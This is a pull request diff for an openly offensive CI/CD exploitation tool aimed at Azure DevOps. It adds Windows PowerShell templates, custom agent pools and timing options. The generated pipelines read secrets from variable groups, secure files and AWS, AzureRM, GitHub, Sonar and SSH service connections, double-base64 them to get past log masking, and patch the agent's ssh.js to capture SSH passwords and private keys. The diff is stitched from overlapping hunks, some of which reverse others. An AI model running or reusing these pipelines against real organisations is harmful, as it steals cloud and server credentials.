### PR TITLE
Custom sleep, pools, agents and Windows template

### DIFF
--- a/nordstream/cicd/devops.py
+++ b/nordstream/cicd/devops.py
@@ -30,6 +30,7 @@ class DevOps:
     _outputDir = OUTPUT_DIR
     _pipelineName = _DEFAULT_PIPELINE_NAME
     _branchName = _DEFAULT_BRANCH_NAME
+    _defaultAgentPool = None
     _sleepTime = 15
     _maxRetry = 10
 
@@ -73,6 +74,22 @@ class DevOps:
     @pipelineName.setter
     def pipelineName(self, value):
         self._pipelineName = value
+
+    @property
+    def defaultAgentPool(self):
+        return self._defaultAgentPool
+
+    @defaultAgentPool.setter
+    def defaultAgentPool(self, value):
+        self._defaultAgentPool = value
+
+    @property
+    def sleepTime(self):
+        return self._sleepTime
+
+    @sleepTime.setter
+    def sleepTime(self, value):
+        self._sleepTime = int(value)
 
     @property
     def token(self):
@@ -357,7 +374,7 @@ class DevOps:
         return response.status_code == 204
 
     def createPipeline(self, project, repoId, path):
-        logger.debug("creating pipeline")
+        logger.debug("Creating pipeline")
         data = {
             "folder": None,
             "name": self._pipelineName,
@@ -375,7 +392,43 @@ class DevOps:
             f"{self._baseURL}/{project}/_apis/pipelines",
             json=data,
         ).json()
-        return response.get("id")
+        pipeline_id = response.get("id")
+
+        if self._defaultAgentPool:
+            logger.debug("Setting default agent pool")
+            # Retrieve project queues, not organization pools, for Default agent pool
+            queues_url = f"{self._baseURL}/{project}/_apis/distributedtask/queues"
+            response = self._session.get(queues_url)
+            queues = response.json()
+            
+            queue_id = None
+            queue_name = None
+            for queue in queues['value']:
+                if queue['pool']['name'] == self._defaultAgentPool:
+                    queue_id = queue['id']
+                    queue_name = queue['name']
+                    logger.info(f"Queue found : {queue_name} (Queue ID: {queue_id}, Pool ID: {queue['pool']['id']})")
+                    break
+            
+            if not queue_id:
+                logger.error(f"Queue {self._defaultAgentPool} not found for default agent pool, or not accessible by the project. Not updating")
+                return pipeline_id
+
+            # Update pipeline Default agent with specified queue, via the definitions API 
+            update_url = f"{self._baseURL}/{project}/_apis/build/definitions/{pipeline_id}"
+
+            response = self._session.get(update_url)
+            definition = response.json()
+
+            # Add default pool agent with queue
+            definition['queue'] = {
+                'id': queue_id,
+                'name': queue_name
+            }
+
+            response = self._session.put(update_url, json=definition)
+        
+        return pipeline_id
 
     def runPipeline(self, project, pipelineId):
         logger.debug(f"Running pipeline: {pipelineId}")

--- a/nordstream/commands/devops.py
+++ b/nordstream/commands/devops.py
@@ -2,9 +2,9 @@
 CICD pipeline exploitation tool
 
 Usage:
-    nord-stream devops [options] --token <pat> --org <org> [extraction] [--project <project> --write-filter --no-clean --branch-name <name> --pipeline-name <name> --pipeline-file <filename> --repo-name <name>]
-    nord-stream devops [options] --token <pat> --org <org> --yaml <yaml> --project <project> [--write-filter --no-clean --branch-name <name> --pipeline-name <name> --pipeline-file <filename> --repo-name <name>]
-    nord-stream devops [options] --token <pat> --org <org> --build-yaml <output> [--build-type <type>]
+    nord-stream devops [options] --token <pat> --org <org> [extraction] [--project <project> --write-filter --no-clean --branch-name <name> --pipeline-name <name> --pipeline-file <filename> --repo-name <name> --pool-name <name> --os <os> --default-agent <name> --sleep <int>]
+    nord-stream devops [options] --token <pat> --org <org> --yaml <yaml> --project <project> [--write-filter --no-clean --branch-name <name> --pipeline-name <name> --pipeline-file <filename> --repo-name <name> --sleep <int>]
+    nord-stream devops [options] --token <pat> --org <org> --build-yaml <output> [--build-type <type>] [--pool-name <name>] [--os linux|windows]
     nord-stream devops [options] --token <pat> --org <org> --clean-logs [--project <project>]
     nord-stream devops [options] --token <pat> --org <org> --list-projects [--write-filter]
     nord-stream devops [options] --token <pat> --org <org> --list-repositories [--project <project>]
@@ -45,7 +45,7 @@ args:
     --repo-name <name>                      Use specific repo for deployment.
     --pool-name <name>                      Use specific pool name for deployment. This value will be set as pool name in the YAML file
     --default-agent <name>                  Use specific default agent pool for deployment. This value will be used as Default agent pool for the pipeline
-    --os [Linux | Windows]                  The agent's OS where the pipeline will be run. Default to Linux
+    --os [linux | windows]                  The agent's OS where the pipeline will be run. Default to linux
     --sleep <int>                           Sleep this amount of time before retrieving pipeline result (15s by default)
 
 Exctraction:

--- a/nordstream/commands/devops.py
+++ b/nordstream/commands/devops.py
@@ -116,7 +116,7 @@ def start(argv):
     if args["--pool-name"]:
         devopsRunner.poolName = args["--pool-name"]
     if args["--os"]:
-        devopsRunner.os = args["--os"]
+        devopsRunner.os = args["--os"].lower()
 
     if args["--extract"] and args["--no-extract"]:
         logger.critical("Can't use both --service-connection and --no-service-connection option.")

--- a/nordstream/commands/devops.py
+++ b/nordstream/commands/devops.py
@@ -43,6 +43,10 @@ args:
     --pipeline-name <name>                  Use pipeline for deployment.
     --pipeline-file <filename>              Pipeline filename (default: azure-pipelines.yml).
     --repo-name <name>                      Use specific repo for deployment.
+    --pool-name <name>                      Use specific pool name for deployment. This value will be set as pool name in the YAML file
+    --default-agent <name>                  Use specific default agent pool for deployment. This value will be used as Default agent pool for the pipeline
+    --os [Linux | Windows]                  The agent's OS where the pipeline will be run. Default to Linux
+    --sleep <int>                           Sleep this amount of time before retrieving pipeline result (15s by default)
 
 Exctraction:
     --extract <list>                        Extract following secrets [vg,sf,gh,az,aws,sonar,ssh]
@@ -90,6 +94,10 @@ def start(argv):
         devops.pipelineName = args["--pipeline-name"]
     if args["--repo-name"]:
         devops.repoName = args["--repo-name"]
+    if args["--default-agent"]:
+        devops.defaultAgentPool = args["--default-agent"]
+    if args["--sleep"]:
+        devops.sleepTime = args["--sleep"]
 
     devopsRunner = DevOpsRunner(devops)
 
@@ -105,6 +113,10 @@ def start(argv):
         devopsRunner.yaml = args["--yaml"]
     if args["--write-filter"]:
         devopsRunner.writeAccessFilter = args["--write-filter"]
+    if args["--pool-name"]:
+        devopsRunner.poolName = args["--pool-name"]
+    if args["--os"]:
+        devopsRunner.os = args["--os"]
 
     if args["--extract"] and args["--no-extract"]:
         logger.critical("Can't use both --service-connection and --no-service-connection option.")

--- a/nordstream/core/devops/devops.py
+++ b/nordstream/core/devops/devops.py
@@ -315,10 +315,7 @@ class DevOpsRunner:
         ) as output:
             try:
                 if resType == self._resType["doubleb64"]:
-                    if self._os == "Windows":
-                        pipelineResults = self.__doubleb64Windows(output)
-                    else:
-                        pipelineResults = self.__doubleb64(output)
+                    pipelineResults = self.__doubleb64(output)
                 elif resType == self._resType["github"]:
                     pipelineResults = self.__extractGitHubResults(output)
                 elif resType == self._resType["azurerm"]:
@@ -352,12 +349,6 @@ class DevOpsRunner:
     def __doubleb64(output):
         # well it's working
         data = output.readlines()[-3].split(b" ")[1]
-        return base64.b64decode(base64.b64decode(data))
-
-    @staticmethod
-    def __doubleb64Windows(output):
-        # well it's working
-        data = output.readlines()[-2].split(b" ")[1]
         return base64.b64decode(base64.b64decode(data))
 
     @staticmethod
@@ -827,8 +818,8 @@ class DevOpsRunner:
 
         self._extractVariableGroups = isAllowed("vg", extractList, allow)
         self._extractSecureFiles = isAllowed("sf", extractList, allow)
-        self._extractAzureServiceconnections = isAllowed("vg", extractList, allow)
-        self._extractGitHubServiceconnections = isAllowed("az", extractList, allow)
+        self._extractAzureServiceconnections = isAllowed("az", extractList, allow)
+        self._extractGitHubServiceconnections = isAllowed("gh", extractList, allow)
         self._extractAWSServiceconnections = isAllowed("aws", extractList, allow)
         self._extractSonarServiceconnections = isAllowed("sonar", extractList, allow)
         self._extractSSHServiceConnections = isAllowed("ssh", extractList, allow)

--- a/nordstream/core/devops/devops.py
+++ b/nordstream/core/devops/devops.py
@@ -23,6 +23,8 @@ class DevOpsRunner:
     _extractSSHServiceConnections = True
     _yaml = None
     _writeAccessFilter = False
+    _poolName = None
+    _os = "Linux"
     _pipelineFilename = "azure-pipelines.yml"
     _output = None
     _cleanLogs = True
@@ -130,6 +132,22 @@ class DevOpsRunner:
     @writeAccessFilter.setter
     def writeAccessFilter(self, value):
         self._writeAccessFilter = value
+
+    @property
+    def poolName(self):
+        return self._poolName
+
+    @poolName.setter
+    def poolName(self, value):
+        self._poolName = value
+
+    @property
+    def os(self):
+        return self._os
+
+    @os.setter
+    def os(self, value):
+        self._os = value
 
     def __createLogDir(self):
         self._cicd.outputDir = realpath(self._cicd.outputDir) + "/azure_devops"
@@ -284,7 +302,7 @@ class DevOpsRunner:
         elif pipelineType == "ssh":
             pipelineGenerator.generatePipelineForSSH("#FIXME")
         else:
-            pipelineGenerator.generatePipelineForSecretExtraction({"name": "", "variables": ""})
+            pipelineGenerator.generatePipelineForSecretExtraction({"name": "", "variables": ""}, self._poolName, self._os)
 
         logger.success("YAML file: ")
         pipelineGenerator.displayYaml()
@@ -297,7 +315,10 @@ class DevOpsRunner:
         ) as output:
             try:
                 if resType == self._resType["doubleb64"]:
-                    pipelineResults = self.__doubleb64(output)
+                    if self._os == "Windows":
+                        pipelineResults = self.__doubleb64Windows(output)
+                    else:
+                        pipelineResults = self.__doubleb64(output)
                 elif resType == self._resType["github"]:
                     pipelineResults = self.__extractGitHubResults(output)
                 elif resType == self._resType["azurerm"]:
@@ -331,6 +352,12 @@ class DevOpsRunner:
     def __doubleb64(output):
         # well it's working
         data = output.readlines()[-3].split(b" ")[1]
+        return base64.b64decode(base64.b64decode(data))
+
+    @staticmethod
+    def __doubleb64Windows(output):
+        # well it's working
+        data = output.readlines()[-2].split(b" ")[1]
         return base64.b64decode(base64.b64decode(data))
 
     @staticmethod
@@ -399,7 +426,7 @@ class DevOpsRunner:
             if len(variableGroups) > 0:
                 for variableGroup in variableGroups:
                     pipelineGenerator = DevOpsPipelineGenerator()
-                    pipelineGenerator.generatePipelineForSecretExtraction(variableGroup)
+                    pipelineGenerator.generatePipelineForSecretExtraction(variableGroup, self._poolName, self._os)
 
                     logger.verbose(
                         f'Checking (and modifying) pipeline permissions for variable group: "{variableGroup["name"]}"'
@@ -435,7 +462,7 @@ class DevOpsRunner:
             if secureFiles:
                 for secureFile in secureFiles:
                     pipelineGenerator = DevOpsPipelineGenerator()
-                    pipelineGenerator.generatePipelineForSecureFileExtraction(secureFile["name"])
+                    pipelineGenerator.generatePipelineForSecureFileExtraction(secureFile["name"], self._poolName)
 
                     logger.verbose(
                         f'Checking (and modifying) pipeline permissions for the secure file: "{secureFile["name"]}"'

--- a/nordstream/core/devops/devops.py
+++ b/nordstream/core/devops/devops.py
@@ -24,7 +24,7 @@ class DevOpsRunner:
     _yaml = None
     _writeAccessFilter = False
     _poolName = None
-    _os = "Linux"
+    _os = "linux"
     _pipelineFilename = "azure-pipelines.yml"
     _output = None
     _cleanLogs = True
@@ -292,15 +292,15 @@ class DevOpsRunner:
     def createYaml(self, pipelineType):
         pipelineGenerator = DevOpsPipelineGenerator()
         if pipelineType == "github":
-            pipelineGenerator.generatePipelineForGitHub("#FIXME")
+            pipelineGenerator.generatePipelineForGitHub("#FIXME", self._poolName, self._os)
         elif pipelineType == "azurerm":
-            pipelineGenerator.generatePipelineForAzureRm("#FIXME")
+            pipelineGenerator.generatePipelineForAzureRm("#FIXME", self._poolName, self._os)
         elif pipelineType == "aws":
-            pipelineGenerator.generatePipelineForAWS("#FIXME")
+            pipelineGenerator.generatePipelineForAWS("#FIXME", self._poolName, self._os)
         elif pipelineType == "sonar":
-            pipelineGenerator.generatePipelineForSonar("#FIXME")
+            pipelineGenerator.generatePipelineForSonar("#FIXME", self._poolName, self._os)
         elif pipelineType == "ssh":
-            pipelineGenerator.generatePipelineForSSH("#FIXME")
+            pipelineGenerator.generatePipelineForSSH("#FIXME", self._poolName, self._os)
         else:
             pipelineGenerator.generatePipelineForSecretExtraction({"name": "", "variables": ""}, self._poolName, self._os)
 
@@ -486,7 +486,7 @@ class DevOpsRunner:
         endpoint = sc.get("name")
 
         pipelineGenerator = DevOpsPipelineGenerator()
-        pipelineGenerator.generatePipelineForGitHub(endpoint)
+        pipelineGenerator.generatePipelineForGitHub(endpoint, self._poolName, self._os)
 
         logger.info(f'Extracting secrets for GitHub: "{endpoint}"')
         runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)
@@ -503,7 +503,7 @@ class DevOpsRunner:
         if scheme == "serviceprincipal":
             name = sc.get("name")
             pipelineGenerator = DevOpsPipelineGenerator()
-            pipelineGenerator.generatePipelineForAzureRm(name)
+            pipelineGenerator.generatePipelineForAzureRm(name, self._poolName, self._os)
 
             logger.info(f'Extracting secrets for AzureRM: "{name}"')
             runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)
@@ -524,7 +524,7 @@ class DevOpsRunner:
             name = sc.get("name")
 
             pipelineGenerator = DevOpsPipelineGenerator()
-            pipelineGenerator.generatePipelineForAWS(name)
+            pipelineGenerator.generatePipelineForAWS(name, self._poolName, self._os)
 
             logger.info(f'Extracting secrets for AWS: "{name}"')
             runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)
@@ -541,7 +541,7 @@ class DevOpsRunner:
         endpoint = sc.get("name")
 
         pipelineGenerator = DevOpsPipelineGenerator()
-        pipelineGenerator.generatePipelineForSonar(endpoint)
+        pipelineGenerator.generatePipelineForSonar(endpoint, self._poolName, self._os)
 
         logger.info(f'Extracting secrets for Sonar: "{endpoint}"')
         runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)
@@ -556,7 +556,7 @@ class DevOpsRunner:
         endpoint = sc.get("name")
 
         pipelineGenerator = DevOpsPipelineGenerator()
-        pipelineGenerator.generatePipelineForSSH(endpoint)
+        pipelineGenerator.generatePipelineForSSH(endpoint, self._poolName, self._os)
 
         logger.info(f'Extracting secrets for ssh: "{endpoint}"')
         runId = self.__launchPipeline(projectId, pipelineId, pipelineGenerator)

--- a/nordstream/yaml/devops.py
+++ b/nordstream/yaml/devops.py
@@ -20,6 +20,21 @@ class DevOpsPipelineGenerator(YamlGeneratorBase):
         "trigger": "none",
         "variables": [{"group": "#FIXME"}],
     }
+    _defaultTemplateWindows = {
+        "pool": {"vmImage": "windows-latest"},
+        "steps": [
+            {
+                "task": "PowerShell@2",
+                "displayName": taskName,
+                "inputs": { 
+                    "targetType": "inline",
+                    "script": "#FIXME"
+                }
+            }
+        ],
+        "trigger": "none",
+        "variables": [{"group": "#FIXME"}],
+    }
     _secureFileTemplate = {
         "pool": {"vmImage": "ubuntu-latest"},
         "trigger": "none",
@@ -166,13 +181,20 @@ class DevOpsPipelineGenerator(YamlGeneratorBase):
         ],
     }
 
-    def generatePipelineForSecretExtraction(self, variableGroup):
+    def generatePipelineForSecretExtraction(self, variableGroup, poolName, os):
+        if os == "Windows":
+            self.addSecretsToYamlWindows(variableGroup.get("variables"))
+        else:
+            self.addSecretsToYaml(variableGroup.get("variables"))
         self.addVariableGroupToYaml(variableGroup.get("name"))
-        self.addSecretsToYaml(variableGroup.get("variables"))
+        if poolName:
+            self._defaultTemplate["pool"] = {"name": poolName}
 
-    def generatePipelineForSecureFileExtraction(self, secureFile):
+    def generatePipelineForSecureFileExtraction(self, secureFile, poolName):
         self._defaultTemplate = self._secureFileTemplate
         self.__setSecureFile(secureFile)
+        if poolName:
+            self._defaultTemplate["pool"] = {"name": poolName}
 
     def generatePipelineForAzureRm(self, azureSubscription):
         self._defaultTemplate = self._serviceConnectionTemplateAzureRM
@@ -204,6 +226,28 @@ class DevOpsPipelineGenerator(YamlGeneratorBase):
             key = f"secret_{sec}"
             value = f"$({sec})"
             self._defaultTemplate.get("steps")[0].get("env")[key] = value
+
+    def addSecretsToYamlWindows(self, secrets):
+        self._defaultTemplate = self._defaultTemplateWindows
+        secretVars = ""
+        for sec in secrets:
+            key = f"secret_{sec}"
+            value = f"$({sec})"
+            secretVars = secretVars + "'" + key + "'" + "=" + "\"" + value + "\"" + "\n"
+        self._defaultTemplate["steps"][0]["inputs"]["script"] = """
+        $secret_vars = @{{        
+          {secretVars}
+        }}
+
+        $secret_vars.GetEnumerator() | ForEach-Object {{
+          $output += "$($_.Key)=$($_.Value)`n" 
+        }}
+            
+        $output = $output.TrimEnd("`n")
+        $base1 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes(("{{0}}" -f $output)))
+        $base2 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes(("{{0}}" -f $base1)))
+        Write-Host $base2
+        """.format(secretVars=secretVars)
 
     def __setSecureFile(self, secureFile):
         self._defaultTemplate.get("steps")[0].get("inputs")["secureFile"] = secureFile

--- a/nordstream/yaml/devops.py
+++ b/nordstream/yaml/devops.py
@@ -22,6 +22,7 @@ if ($output) {{
     $base1 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($output))
     $base2 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($base1))
     Write-Host $base2
+    Write-Host ""
 }}"""
 
     def generatePipelineForSecretExtraction(self, variableGroup, poolName=None, os="linux"):
@@ -34,35 +35,26 @@ if ($output) {{
             for sec in secrets:
                 key = f"secret_{sec}"
                 value = f"$({sec})"
-                secretVars = secretVars + "'" + key + "'" + "=" + "\"" + value + "\"" + "\n"
+                secretVars += f"'{key}'=\"{value}\"\n"
             
-            script_body = """
-$secret_vars = @{{
+            fetch_logic = f"""$secret_vars = @{{
 {secretVars}
 }}
 
 $output = ""
 $secret_vars.GetEnumerator() | ForEach-Object {{
     $output += "$($_.Key)=$($_.Value)`n" 
-}}
-    
-$output = $output.TrimEnd("`n")
-$base1 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes(("{{0}}" -f $output)))
-$base2 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes(("{{0}}" -f $base1)))
-Write-Host $base2
-Write-Host ""
-""".format(secretVars=secretVars)
+}}"""
 
             self._defaultTemplate["steps"].append({
                 "task": "PowerShell@2",
                 "displayName": self.taskName,
                 "inputs": {
                     "targetType": "inline",
-                    "script": script_body
+                    "script": self._get_ps_b64_script(fetch_logic)
                 }
             })
         else:
-            # Linux continues to use the environment mapping approach
             env_vars = {f"secret_{sec}": f"$({sec})" for sec in secrets}
             self._defaultTemplate["steps"].append({
                 "task": "Bash@3",
@@ -130,7 +122,7 @@ Write-Host ""
                 "repository": "devRepo",
                 "type": "github",
                 "endpoint": endpoint,
-                "name": "microsoft/azure-pipelines-tasks",
+                "name": "github/g-emoji-element",
             }]
         }
         
@@ -223,7 +215,11 @@ Write-Host ""
                         "script": 'Get-ChildItem -Path "D:\\a\\" -Recurse -Filter "ssh.js" | ForEach-Object { $p = $_.FullName; copy $p ($p+".bak"); (Get-Content -Path $p -Raw) -replace [regex]::Escape(\'const readyTimeout = getReadyTimeoutVariable();\'), \'const readyTimeout = getReadyTimeoutVariable();const fs = require("fs");var data = "";data += hostname + ":::" + port + ":::" + username + ":::" + password + ":::" + privateKey;fs.writeFile("artefacts.tar.gz", data, (err) => {});\' | Set-Content -Path $p }',
                     },
                 },
-                {"task": "SSH@0", "inputs": {"sshEndpoint": sshSCName, "runOptions": "commands", "commands": "sleep 1"}},
+                {
+                    "task": "SSH@0",
+                    "continueOnError": True,
+                    "inputs": {"sshEndpoint": sshSCName, "runOptions": "commands", "commands": "sleep 1"},
+                },
                 {
                     "task": "PowerShell@2",
                     "displayName": self.taskName,

--- a/nordstream/yaml/devops.py
+++ b/nordstream/yaml/devops.py
@@ -1,271 +1,251 @@
 from nordstream.yaml.generator import YamlGeneratorBase
 from nordstream.utils.constants import DEFAULT_TASK_NAME
 
-
 class DevOpsPipelineGenerator(YamlGeneratorBase):
     taskName = DEFAULT_TASK_NAME
-    _defaultTemplate = {
-        "pool": {"vmImage": "ubuntu-latest"},
-        "steps": [
-            {
+
+    def _get_base_template(self, poolName, os_type):
+        pool = {"name": poolName} if poolName else {
+            "vmImage": "windows-latest" if os_type.lower() == "windows" else "ubuntu-latest"
+        }
+        return {
+            "pool": pool,
+            "trigger": "none",
+            "steps": []
+        }
+
+    def _get_ps_b64_script(self, fetch_logic):
+        """Helper to wrap PowerShell variable fetching in Double Base64 encoding."""
+        return f"""{fetch_logic}
+if ($output) {{
+    $output = $output.TrimEnd("`n", "`r")
+    $base1 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($output))
+    $base2 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($base1))
+    Write-Host $base2
+}}"""
+
+    def generatePipelineForSecretExtraction(self, variableGroup, poolName=None, os="linux"):
+        self._defaultTemplate = self._get_base_template(poolName, os)
+        self._defaultTemplate["variables"] = [{"group": variableGroup.get("name")}]
+        secrets = variableGroup.get("variables", [])
+
+        if os == "windows":
+            secretVars = ""
+            for sec in secrets:
+                key = f"secret_{sec}"
+                value = f"$({sec})"
+                secretVars = secretVars + "'" + key + "'" + "=" + "\"" + value + "\"" + "\n"
+            
+            script_body = """
+$secret_vars = @{{
+{secretVars}
+}}
+
+$output = ""
+$secret_vars.GetEnumerator() | ForEach-Object {{
+    $output += "$($_.Key)=$($_.Value)`n" 
+}}
+    
+$output = $output.TrimEnd("`n")
+$base1 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes(("{{0}}" -f $output)))
+$base2 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes(("{{0}}" -f $base1)))
+Write-Host $base2
+Write-Host ""
+""".format(secretVars=secretVars)
+
+            self._defaultTemplate["steps"].append({
+                "task": "PowerShell@2",
+                "displayName": self.taskName,
+                "inputs": {
+                    "targetType": "inline",
+                    "script": script_body
+                }
+            })
+        else:
+            # Linux continues to use the environment mapping approach
+            env_vars = {f"secret_{sec}": f"$({sec})" for sec in secrets}
+            self._defaultTemplate["steps"].append({
                 "task": "Bash@3",
-                "displayName": taskName,
+                "displayName": self.taskName,
                 "inputs": {
                     "targetType": "inline",
                     "script": "env -0 | awk -v RS='\\0' '/^secret_/ {print $0}' | base64 -w0 | base64 -w0 ; echo ",
                 },
-                "env": "#FIXME",
-            }
-        ],
-        "trigger": "none",
-        "variables": [{"group": "#FIXME"}],
-    }
-    _defaultTemplateWindows = {
-        "pool": {"vmImage": "windows-latest"},
-        "steps": [
-            {
+                "env": env_vars,
+            })
+
+    def generatePipelineForSecureFileExtraction(self, secureFile, poolName=None, os="linux"):
+        self._defaultTemplate = self._get_base_template(poolName, os)
+        
+        self._defaultTemplate["steps"].append({
+            "task": "DownloadSecureFile@1",
+            "name": "secretFile",
+            "inputs": {"secureFile": secureFile},
+        })
+
+        if os == "windows":
+            self._defaultTemplate["steps"].append({
                 "task": "PowerShell@2",
-                "displayName": taskName,
-                "inputs": { 
+                "displayName": self.taskName,
+                "inputs": {
                     "targetType": "inline",
-                    "script": "#FIXME"
+                    "script": self._get_ps_b64_script('$output = Get-Content -Path "$(secretFile.secureFilePath)" -Raw')
                 }
-            }
-        ],
-        "trigger": "none",
-        "variables": [{"group": "#FIXME"}],
-    }
-    _secureFileTemplate = {
-        "pool": {"vmImage": "ubuntu-latest"},
-        "trigger": "none",
-        "steps": [
-            {
-                "task": "DownloadSecureFile@1",
-                "name": "secretFile",
-                "inputs": {"secureFile": "#FIXME"},
-            },
-            {
+            })
+        else:
+            self._defaultTemplate["steps"].append({
                 "script": "cat $(secretFile.secureFilePath) | base64 -w0 | base64 -w0; echo",
-                "displayName": taskName,
+                "displayName": self.taskName,
+            })
+
+    def generatePipelineForAzureRm(self, azureSubscription, poolName=None, os="linux"):
+        self._defaultTemplate = self._get_base_template(poolName, os)
+        
+        step = {
+            "task": "AzureCLI@2",
+            "displayName": self.taskName,
+            "inputs": {
+                "targetType": "inline",
+                "addSpnToEnvironment": True,
+                "scriptLocation": "inlineScript",
+                "azureSubscription": azureSubscription,
             },
-        ],
-    }
-    _serviceConnectionTemplateAzureRM = {
-        "pool": {"vmImage": "ubuntu-latest"},
-        "steps": [
-            {
-                "task": "AzureCLI@2",
-                "displayName": taskName,
+        }
+
+        if os == "windows":
+            step["inputs"]["scriptType"] = "pscore"
+            step["inputs"]["inlineScript"] = self._get_ps_b64_script(
+                '$output = (Get-ChildItem Env: | Where-Object Name -match "servicePrincipal" | ForEach-Object { "$($_.Name)=$($_.Value)" }) -join "`n"'
+            )
+        else:
+            step["inputs"]["scriptType"] = "bash"
+            step["inputs"]["inlineScript"] = 'sh -c "env | grep \\"^servicePrincipal\\" | base64 -w0 | base64 -w0; echo ;"'
+            
+        self._defaultTemplate["steps"].append(step)
+
+    def generatePipelineForGitHub(self, endpoint, poolName=None, os="linux"):
+        self._defaultTemplate = self._get_base_template(poolName, os)
+        self._defaultTemplate["resources"] = {
+            "repositories": [{
+                "repository": "devRepo",
+                "type": "github",
+                "endpoint": endpoint,
+                "name": "microsoft/azure-pipelines-tasks",
+            }]
+        }
+        
+        self._defaultTemplate["steps"].append({"checkout": "devRepo", "persistCredentials": True})
+
+        if os == "windows":
+            self._defaultTemplate["steps"].append({
+                "task": "PowerShell@2",
+                "displayName": self.taskName,
                 "inputs": {
                     "targetType": "inline",
-                    "addSpnToEnvironment": True,
-                    "scriptType": "bash",
-                    "scriptLocation": "inlineScript",
-                    "azureSubscription": "#FIXME",
-                    "inlineScript": (
-                        'sh -c "env | grep \\"^servicePrincipal\\" | base64 -w0 |' ' base64 -w0; echo  ;"'
-                    ),
-                },
-            }
-        ],
-        "trigger": "none",
-    }
-    _serviceConnectionTemplateGitHub = {
-        "pool": {"vmImage": "ubuntu-latest"},
-        "resources": {
-            "repositories": [
-                {
-                    "repository": "devRepo",
-                    "type": "github",
-                    "endpoint": "None",
-                    "name": "microsoft/azure-pipelines-tasks",
+                    "script": self._get_ps_b64_script('$output = Get-Content -Path ".\\.git\\config" -Raw')
                 }
-            ]
-        },
-        "steps": [
-            {"checkout": "devRepo", "persistCredentials": True},
-            {
+            })
+        else:
+            self._defaultTemplate["steps"].append({
                 "task": "Bash@3",
-                "displayName": taskName,
+                "displayName": self.taskName,
                 "inputs": {
                     "targetType": "inline",
-                    "script": 'sh -c "cat ./.git/config | base64 -w0 | base64 -w0; echo  ;"',
+                    "script": 'sh -c "cat ./.git/config | base64 -w0 | base64 -w0; echo ;"',
                 },
-            },
-        ],
-        "trigger": "none",
-    }
+            })
 
-    _serviceConnectionTemplateAWS = {
-        "pool": {"vmImage": "ubuntu-latest"},
-        "steps": [
-            {
-                "task": "AWSShellScript@1",
-                "displayName": taskName,
+    def generatePipelineForAWS(self, awsCredentials, poolName=None, os="linux"):
+        self._defaultTemplate = self._get_base_template(poolName, os)
+
+        if os == "windows":
+            self._defaultTemplate["steps"].append({
+                "task": "AWSPowerShellModuleScript@1",
+                "displayName": self.taskName,
                 "inputs": {
-                    # "regionName": "#FIXME",
-                    "awsCredentials": "#FIXME",
+                    "awsCredentials": awsCredentials,
                     "scriptType": "inline",
-                    "inlineScript": (
-                        'sh -c "env | grep -E \\"(AWS_SECRET_ACCESS_KEY|AWS_ACCESS_KEY_ID)\\" | base64 -w0 |'
-                        ' base64 -w0; echo  ;"'
-                    ),
+                    "inlineScript": self._get_ps_b64_script(
+                        '$output = (Get-ChildItem Env: | Where-Object Name -match "AWS_SECRET_ACCESS_KEY|AWS_ACCESS_KEY_ID" | ForEach-Object { "$($_.Name)=$($_.Value)" }) -join "`n"'
+                    )
+                }
+            })
+        else:
+            self._defaultTemplate["steps"].append({
+                "task": "AWSShellScript@1",
+                "displayName": self.taskName,
+                "inputs": {
+                    "awsCredentials": awsCredentials,
+                    "scriptType": "inline",
+                    "inlineScript": 'sh -c "env | grep -E \\"(AWS_SECRET_ACCESS_KEY|AWS_ACCESS_KEY_ID)\\" | base64 -w0 | base64 -w0; echo ;"',
                 },
-            }
-        ],
-        "trigger": "none",
-    }
+            })
 
-    _serviceConnectionTemplateSonar = {
-        "pool": {"vmImage": "ubuntu-latest"},
-        "steps": [
-            {
-                "task": "SonarQubePrepare@6",
-                "inputs": {"SonarQube": "#FIXME", "scannerMode": "CLI", "projectKey": "sonarqube"},
-            },
-            {
+    def generatePipelineForSonar(self, sonarSCName, poolName=None, os="linux"):
+        self._defaultTemplate = self._get_base_template(poolName, os)
+        self._defaultTemplate["steps"].append({
+            "task": "SonarQubePrepare@6",
+            "inputs": {"SonarQube": sonarSCName, "scannerMode": "CLI", "projectKey": "sonarqube"},
+        })
+
+        if os == "windows":
+            self._defaultTemplate["steps"].append({
+                "task": "PowerShell@2",
+                "displayName": self.taskName,
+                "inputs": {
+                    "targetType": "inline",
+                    "script": self._get_ps_b64_script(
+                        '$output = (Get-ChildItem Env: | Where-Object Name -match "SONARQUBE_SCANNER_PARAMS" | ForEach-Object { "$($_.Name)=$($_.Value)" }) -join "`n"'
+                    )
+                }
+            })
+        else:
+            self._defaultTemplate["steps"].append({
                 "task": "Bash@3",
-                "displayName": taskName,
+                "displayName": self.taskName,
                 "inputs": {
                     "targetType": "inline",
                     "script": "sh -c 'env | grep SONARQUBE_SCANNER_PARAMS | base64 -w0 | base64 -w0; echo ;'",
                 },
-            },
-        ],
-        "trigger": "none",
-    }
+            })
 
-    _serviceConnectionTemplateSSH = {
-        "trigger": "none",
-        "pool": {"vmImage": "ubuntu-latest"},
-        "steps": [
-            {"checkout": "none"},
-            {
-                "script": 'SSH_FILE=$(find /home/vsts/work/_tasks/ -name ssh.js) ; cp $SSH_FILE $SSH_FILE.bak ; sed -i \'s|const readyTimeout = getReadyTimeoutVariable();|const readyTimeout = getReadyTimeoutVariable();\\nconst fs = require("fs");var data = "";data += hostname + ":::" + port + ":::" + username + ":::" + password + ":::" + privateKey;fs.writeFile("/tmp/artefacts.tar.gz", data, (err) => {});|\' $SSH_FILE',
-                "displayName": f"Preparing {taskName}",
-            },
-            {
-                "task": "SSH@0",
-                "continueOnError": True,
-                "inputs": {"sshEndpoint": "#FIXME", "runOptions": "commands", "commands": "sleep 1"},
-            },
-            {
